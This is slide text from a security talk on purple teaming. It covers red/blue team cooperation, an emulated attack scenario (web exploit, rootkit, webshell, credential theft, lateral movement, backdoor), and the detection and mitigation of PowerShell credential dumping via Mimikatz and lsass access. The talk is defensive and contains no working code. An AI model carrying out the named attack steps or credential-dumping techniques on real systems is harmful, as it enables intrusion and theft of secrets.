奧義智慧 Proprietary and Confidential Information

Purple Team紅藍隊的相愛相殺

Who Am I

►Shang-De Jiang ( @SecurityThunder )►Cyber Security Researcher @ 奧義智慧

►Speaker of HITCON, Black Hat USA(2020)

►UCCU Hacker Co-Founder►Private Cyber Security Group in Taiwan

奧義智慧 @ MITRE ATT&CK Evaluation

CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round

BAD PYRAMID

https://danielmiessler.com/blog/the-definition-green-team-how-different-red-team/

Maturity Level

Vuln ManagementPenetration

Testing

Blind/Internal

Red Team

In Person/

Continues

Purple Team

Ref: Bryson Bort (scythe)

The Team Conflict of Red&Blue

►Red Team (KPI: find security issue)

►Troublemaker

►Security flaw

►Impact blue team performance

►Blue Team (KPI: less security issue)

►Old-school

►Conservative

►Never patch the vuln

Credit: Robert Couse-Baker

Access Control

Security Monitoring

Incident Response

Help Desk

Exploit Development

Penetration test

Social Engineering

Vulnerability Scan

Purple Team: Improve Security Posture

The reason why you need purple team

►Improve MTTD (mean time to detect)

►Improve MTTR (mean time to respond)

►Benefit for organization security monitor maturity►No matter at what level.

►Guide to identify org's current gap

►Even organization has red team assessment

奧義智慧 Proprietary and Confidential Information

Build Your Purple Team

Preparation

►Objectives►Determine testing scope and target

►Blue & Red team member selection►Ensure that representatives from each aspect of the blue team are involved

►Red team need has experience

►Referee

►Communication bridge between attack&defense team

Planning - map your attack surface

The real threat behind the incident

https://www.inside.com.tw/article/20479-garmin-outage-ransomware-sources

Planning - design attack scenario

►Emulate the real incident experienced in the organization/industry

►Review historical red team exercise

►Improve attack complexity gradually1.Common tools, Penetration testing framework

2.Evasive the attack

3.Create own tools

奧義智慧 Proprietary and Confidential Information

ExecutionA dve r sar y Emu lat ion

CALDERA

►Automated adversary emulation

►End-to-End: start initial access until data exfiltration.

►Repeatable: improvement can be measured over time.

Playbook

APT3 APT29 Dogeza

https://attackevals.mitre.org https://attackevals.mitre.org

RoleSoftware and Environment

IP Address

Red Team

Kali 4.15.0, MS15-015

172.16.40.225

Blue Team

Xensor, CyCraft, CyberTotal

172.16.40.230172.16.40.231

Victim A

Linux Ubuntu 16.04172.16.40.232

Victim B

Windows Server 2012 R2

172.16.40.226

Victim C

Windows 10 (1607) English

172.16.40.227

Blue TeamRed Team

Win Desktop

VictimLinux

Linux Apache

Dogeza Playbook Scenario

Dogeza Red-Blue Team Step

►Part I – Setup & Linux Red Team Step

Procedure

1Blue Team then deploys software on Victim A, B and C

2Red Team use web exploit to attacks Victim A

3Red Team takes privilege escalation in Victim A

4Red Team implants forged ssh key for persistence

5Red Team installs a kernel rootkit and hides a process in Victim A

6Red Team constructs a tunnel to reach internal Victim B

Step

Procedure

8Red Team exploits Victim B via the tunnel to implant webshell (skip, duplicated as step 3)

9 Red Team launch webshell of Victim B

10Red Team obtains the privilege and credentials of Victim B

11 Red Team moves laterally to Victim C

12Red Team collects sensitive documents and deploys backdoor on Victim C

13 Blue Team generates investigation report

奧義智慧 Proprietary and Confidential Information

Review

Review testing result

►Roundtable meeting►Not just wait the final report

►Deep dives the technique

►Let attacker & defender sit together study the attack.

►Review finding and new plan►Open Q&A time for red&blue team. Share finding, detection ,mitigation plan.

Measure Performance

►Before ►After

Blue Team Evolution

Detect Target – PowerShell OS cred dumping• ATT&CK evaluation – APT29 step 6.C.1, PowerShell Dump OS credential

The attack method want to detect

►PowerShell download remote script

►OS Credential Dumping via PowerShell

Detect from command line10 1

Detect from process loaded library 0 2

Check PowerShell eventlog

• EventID : 4104

• EventID : 4103

0 3

Check called API

►PowerShell will call .net lib, if you

can hook all API then you know

PowerShell's behavior.

0 4

AMSI

Ref: https://docs.microsoft.com/

0 5

Stage 1 Stage 2 Stage 3 Stage 4

Process Cmd Param

Detect PowerShell with cmd-

line PowerShell invoke-

mimikatz

Loaded DLLsDetect powershell.exe has

loaded suspicious

credential dumping dll,

Crypt32.dll, User32.dll,

Advapi32.dll

Windows Event Log

Log windows event 4104,4103

API monitoring

Monitoring PowerShell

call OpenProcess access

lsass process memeory

AMSI

Stage 5

Data Sources Evolution

Using AMSI module log

every PowerShell event

0 1 0 2 0 3

Cred Access Protection

Use capabilities to prevent

successful credential access by

adversaries; including blocking

forms of credential dumping.

e.g. Credential Guard

Privileged Account ManagementManage the creation,

modification, use, and

permissions associated to

privileged accounts, including

SYSTEM and root.

Restrict PowerShell execution

policy to administrators.

Execution Prevention

Block execution of code on a

system through application

control, and/or script blocking.

e.g. AppLocker

Implement Mitigation

0 4

PowerShell Constrained Language

Permits all cmdlets and all

PowerShell language elements,

but it limits permitted types.

Ref: https://attack.mitre.org/https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes

KEY TAKEAWAYS

1. Have a purple team to make your security team work together

2. Purple team is not a replacement to red team

3. Security not just buy more product; The exercise is also important

4. Identify the security gap and do detection/mitigation

奧義智慧 Proprietary and Confidential Information

Q&A Time